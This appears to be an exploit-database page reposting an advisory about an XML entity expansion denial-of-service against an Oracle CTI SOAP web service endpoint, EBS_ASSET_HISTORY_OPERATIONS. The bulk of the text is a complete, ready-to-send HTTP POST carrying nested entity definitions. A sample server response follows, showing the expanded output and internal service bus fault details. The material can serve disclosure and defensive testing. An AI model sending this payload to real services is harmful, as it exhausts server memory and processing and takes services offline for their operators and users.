Registeroracle cti web service ebs_asset_history_operations xml entity injection
▸▸▸ Exploit & Vulnerability >> webapps exploit & java vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Oracle CTI Web Service XML Entity Exp. # Exploit Author: omurugur # Author Web: https://www.justsecnow.com # Author Social: @omurugurrr URL : http://server/EBS_ASSET_HISTORY_OPERATIONS As can be seen in the following request / response example, the xml entity expansion attack can be performed, and this attack can send requests that exceed the existing memory and processor capacities, causing memory bottlenecks and preventing the service from running. 10kb more request is returned. Examples Request; POST /EBS_ASSET_HISTORY_OPERATIONS HTTP/1.1 Accept-Encoding: gzip, deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "getCampaignHistory" Content-Length: 1696 Host: **** User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: close <!DOCTYPE foo [<!ENTITY ha "Ha !"> <!ENTITY ha2 "&ha; &ha; &ha; &ha; &ha; &ha; &ha; &ha;"> <!ENTITY ha3 "&ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2;"> <!ENTITY ha4 "&ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3;"> <!ENTITY ha5 "&ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4;"> <!ENTITY ha6 "&ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5;"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ebs="http://server/om/EBS_ASSET_HISTORY_OPERATIONS" xmlns:ave="http://server/AveaFrameWo&ha6;rk"> <soapenv:Header/> <soapenv:Body> <ebs:EbsRetrieveWebChatHistoryRequest> <ave:RequestHeader> <ave:RequestId> <ave:GUID>152069827209115206982720</ave:GUID> </ave:RequestId> <ave:CallingSystem>SIEBEL</ave:CallingSystem> <ave:BusinessProcessId>retrieveWebChatHistory</ave:BusinessProcessId> </ave:RequestHeader> <ebs:RequestBody> <ebs:msisdn>5051234567</ebs:msisdn> </ebs:RequestBody> </ebs:EbsRetrieveWebChatHistoryRequest> </soapenv:Body> </soapenv:Envelope> Example Response1; HTTP/1.1 500 Internal Server Error Date: Tue, 17 Apr 2018 06:33:07 GMT Content-Type: text/xml; charset=utf-8 X-ORACLE-DMS-ECID: c55d8ba7-c405-4117-8a70-8b37f745e8f0-0000b9df X-ORACLE-DMS-RID: 0 Connection: close Content-Length: 328676 <?xml version="1.0" encoding="UTF-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header xmlns:ave="http://server/AveaFrameWoHa ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha !rk" xmlns:ebs="http://server/om/EBS_ASSET_HISTORY_OPERATIONS"><soapenv:Fault><faultcode>soapenv:Server.SYS000000</faultcode><faultstring>Undefined Avea Service Bus Error</faultstring><detail><faul:ExceptionSchema xmlns:faul="http://server/Fault"><faul:UUID>MW-4b9f61d0-7792-4e54-a694-b9ef8c407b7e</faul:UUID><faul:Exception><faul:system>SYSTEM</faul:system><faul:code>OSB-382510</faul:code><faul:message>SYS000000:Undefined Avea Service Bus Error</faul:message><faul:stackTrace>PipelinePairNodePipelinePairNode_requestDynamic Validationrequest-pipelinetrue</faul:stackTrace></faul:Exception></faul:ExceptionSchema></detail></soapenv:Fault></soapenv:Body></soapenv:Envelope>
Oracle cti web service ebs_asset_history_operations xml entity injection Vulnerability / Exploit Source : Oracle cti web service ebs_asset_history_operations xml entity injection
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes